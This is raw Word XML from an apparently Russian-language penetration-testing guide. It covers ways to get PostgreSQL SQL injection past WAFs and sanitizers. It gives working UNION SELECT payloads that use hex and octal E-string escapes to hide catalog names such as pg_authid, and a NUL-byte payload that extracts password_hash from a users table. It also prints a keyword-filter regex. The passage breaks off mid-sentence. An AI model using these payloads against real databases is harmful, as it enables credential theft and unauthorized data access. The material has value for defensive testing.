          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: standard_conforming_strings GUC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A887FE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL:2003 standard § 5.3 — Unicode delimiter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (общий контекст; полный стандарт за пейволлом)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619EC090" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — Unicode escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224E4ED3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — Unicode escape bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3132A774" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.9.4 Escape strings E'\x27' (hex/octal byte literals)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4EECD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E032C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Близкий приём к 3.9.3 (Unicode-escape), но другой синтаксис и другой класс обходов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61087A6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b(dblink|pg_read|pg_authid|...)\w*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — подстрока имени функции/каталога: hex/octal-byte literals скрывают её ещё компактнее (2 hex-цифры на байт против 4 в Unicode-escape).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4D4652" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C-string sanitizer (NUL-truncation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — главный собственный класс E-strings. Если sanitizer написан на C или вызывает C-библиотеку (libxml2, OpenSSL escape, и т.п.), его строковая обработка обрывается на первом NUL-байте. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'admin\x00 || dangerous payload'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — sanitizer видит только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, PG читает всю строку, потому что PG-строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не C-strings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: NUL внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хранится как обычный байт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388F7D66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Альтернативный escape-формат, когда фильтр заточен на конкретную форму</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — фильтр блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но пропускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\NNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (octal) или наоборот; E-strings допускают оба синтаксиса в одной строке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CA8213" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Также E-strings — единственный синтаксис в PG, который позволяет вставить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>управляющие символы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в литерал напрямую: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\f</w:t>
      </w:r>
      <w:r>
        <w:t>. Это особенно полезно в связке с 3.12.2 (newline в комментарии) и 3.12.3 (CVE-2025-8715, newline в идентификаторе).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED12CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — hex-byte literals для содержимого</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F74513" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст — фильтр блокирует подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'pg_authid'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021B462" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1811DC36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, name, current_database() FROM (SELECT rolname AS name FROM E'\x70\x67\x5F\x61\x75\x74\x68\x69\x64'::regclass::text::regclass) t WHERE 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039B779" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это компактнее, чем 3.9.3, но в данном конкретном случае каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через text-литерал имени работает только при специальном обращении — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> лучше через прямой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 3.9.2 Payload B). Более чистый Payload A для E-strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414044BF"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E'\x61\x64\x6D\x69\x6E\x40\x63\x6F\x2E\x63\x6F\x6D' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599A182C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E2E79"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5A698D4E"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1E5ECFC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3655514B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE email = E'\x61\x64\x6D\x69\x6E\x40\x63\x6F\x2E\x63\x6F\x6D' --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C81D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG лексер видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, интерпретирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как hex-byte (2 hex-цифры). Собирается строка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@co.com'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. WAF в payload-тексте подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не находил.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AADD58C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — octal-byte literals (альтернатива для escape-strip sanitizer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E6176F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitizer вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value.replace(r'\x', '')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нейтрализует Payload A (превратит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x61</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>61</w:t>
      </w:r>
      <w:r>
        <w:t>). Octal-форма (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\NNN</w:t>
      </w:r>
      <w:r>
        <w:t>, ровно 3 octal-цифры) этим фильтром не затрагивается:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1DB0F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A39E3"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E'\141\144\155\151\156\100\143\157\56\143\157\155' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622B8A9C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\141</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (octal 141) = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x61</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\144</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и т.д. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B717803"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0B15CFCD"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5ED1B49A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A5C93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE email = E'\141\144\155\151\156\100\143\157\56\143\157\155' --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8E4B11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG лексер парсит octal-escape по тому же §4.1.2.2, что и hex. Sanitizer на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не сработал — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E2B8F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — NUL-byte для C-string sanitizer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDDF9B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sanitizer — C-функция или Python-функция, вызывающая C-библиотеку с обработкой NUL-terminated. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сразу обрывает её view payload-а:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC217EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload (предполагаемый сценарий — sanitizer вызывает libxml2 для XML-валидации параметра, libxml2 трактует NUL как конец строки):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1CEAB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT id, E'safe-prefix\x00 IGNORED BY libxml2: ' || password_hash, body FROM users LIMIT 1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72644AFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9D98B7"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14F85F01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT id, E'safe-prefix\x00 IGNORED BY libxml2: ' || password_hash, body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17615786" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM users LIMIT 1 --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C675EF7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ответа клиент получит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'safe-prefix\x00 IGNORED BY libxml2: &lt;hash&gt;'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>отдаёт</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ответ через C-stack (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psycopg2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исторически имел проблемы с NUL в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-возвратах) — клиент увидит только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'safe-prefix'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Но обычный Python-stack (psycopg3, asyncpg) трактует NUL как обычный байт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
